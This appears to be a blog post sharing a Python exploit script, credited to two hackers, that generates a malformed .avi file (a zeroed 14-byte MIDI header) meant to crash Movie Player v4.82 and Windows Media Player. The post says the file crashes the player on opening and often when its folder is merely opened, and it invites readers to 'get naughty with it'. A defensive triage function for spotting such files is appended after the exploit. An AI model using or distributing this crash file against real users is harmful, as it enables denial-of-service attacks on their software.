I came across an interesting buffer overflow exploit which exploits the memory vulnerability in Movie Player and can also be used successfully against Windows Media Player. The exploit can be used to perform a Denial of Service attack and causes the application to crash. Those who don't know about buffer overflows can read the article here.

If run properly, there is often a crash whenever the victim opens the folder in which the exploit is placed. Here is the exploit, coded by ^Xecuti0N3r & d3M0l!tioN3r:

#!/usr/bin/python
#(+)Exploit Title: Movie Player v4.82 0Day Buffer overflow/DOS Exploit
#(+)Software Link: http://www.movieplay.org/download.php
#(+)Software : Movie Player
#(+)Version : v4.82
#(+)Tested On : WIN-XP SP3
#(+) Date : 31.03.2011
#(+) Hour : 3:37 PM
#Similar Bug was found by cr4wl3r in MediaPlayer Classic

import time

# Banner
print(" _______________________________________________________________________")
print("(+)Exploit Title: Movie Player v4.82 0Day Buffer overflow/DOS Exploit")
print("(+) Software Link: http://www.movieplay.org/download.php")
print("(+) Software : Movie Player")
print("(+) Version : v4.82")
print("(+) Tested On : WIN-XP SP3")
print("(+) Date : 31.03.2011")
print("(+) Hour : 13:37 PM ")
print("____________________________________________________________________\n")

time.sleep(2)
print("\nGenerating the exploit file !!!")
time.sleep(2)
print("\n\nMoviePlayerExploit.avi file generated!!")
time.sleep(2)

# Write the test file: a 14-byte "MThd" (MIDI) header, length 6,
# with the format, track count and division fields all zero, saved as .avi.
ExploitLocation = "C:\\MoviePlayerExploit.avi"
f = open(ExploitLocation, "wb")
memoryloc = b'\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00'
f.write(memoryloc)
f.close()

print("\n\n(+) Done!\n")
print("(+) Now Just open MoviePlayerExploit.avi with Movie Player and Kaboooommm !! ;)\n")
print("(+) Most of the times there is a crash\nwhenever you open the folder where the MoviePlayerExploit.avi is stored :D\n")
time.sleep(2)
time.sleep(1)

# Credits
print("\n\n\n########################################################################\n(+)Exploit Coded by: ^Xecuti0N3r & d3M0l!tioN3r\n")
print("(+)^Xecuti0N3r: E-mail\n")
print("(+)d3M0l!tioN3r: E-mail\n")
print("(+)Special Thanks to: MaxCaps & aNnIh!LatioN3r\n")
print("########################################################################\n\n")
time.sleep(4)

You need Python to run it; once the file is generated, you can test it in a virtual machine. Try opening it using Windows Media Player; it will crash instantly. The more ingenious of you can get naughty with it :)
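The file the script writes is nothing more than a 14-byte MIDI "MThd" header with every field zeroed and an .avi extension, so it can be recognised before it reaches a player. The following is an added example, not part of the original exploit or post: a pre-open triage check in which the function name triage_media and the individual findings are assumptions, since the post does not say which field causes the crash.

```python
import struct

# Constructed sample: the same 14 bytes the script above writes to MoviePlayerExploit.avi.
SAMPLE = b"\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00"


def triage_media(data, filename):
    """Return a list of findings for a file about to be handed to a media player."""
    findings = []
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    is_riff_avi = len(data) >= 12 and data[:4] == b"RIFF" and data[8:12] == b"AVI "
    if ext == "avi" and not is_riff_avi:
        findings.append("extension is .avi but content is not a RIFF/AVI container")
    if data[:4] != b"MThd":
        return findings
    if ext not in ("mid", "midi"):
        findings.append("MIDI header (MThd) found under a non-MIDI extension")
    if len(data) < 14:
        findings.append("MThd header truncated")
        return findings
    # MThd layout: 4-byte tag, 32-bit length, then 16-bit format,
    # track count and time division, all big-endian.
    length, fmt, ntrks, division = struct.unpack(">IHHH", data[4:14])
    if length != 6:
        findings.append("MThd length is %d, expected 6" % length)
    if fmt not in (0, 1, 2):
        findings.append("unknown MIDI format %d" % fmt)
    if ntrks == 0:
        findings.append("header declares zero tracks")
    if division == 0:
        findings.append("time division is zero")
    # A usable MIDI file has at least one MTrk chunk right after the header.
    if data[8 + length:12 + length] != b"MTrk":
        findings.append("no MTrk chunk follows the header")
    return findings


if __name__ == "__main__":
    for finding in triage_media(SAMPLE, "MoviePlayerExploit.avi"):
        print("[!] " + finding)
```

A file that returns any finding can be quarantined instead of being opened or left in a folder the shell will preview.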

cheers..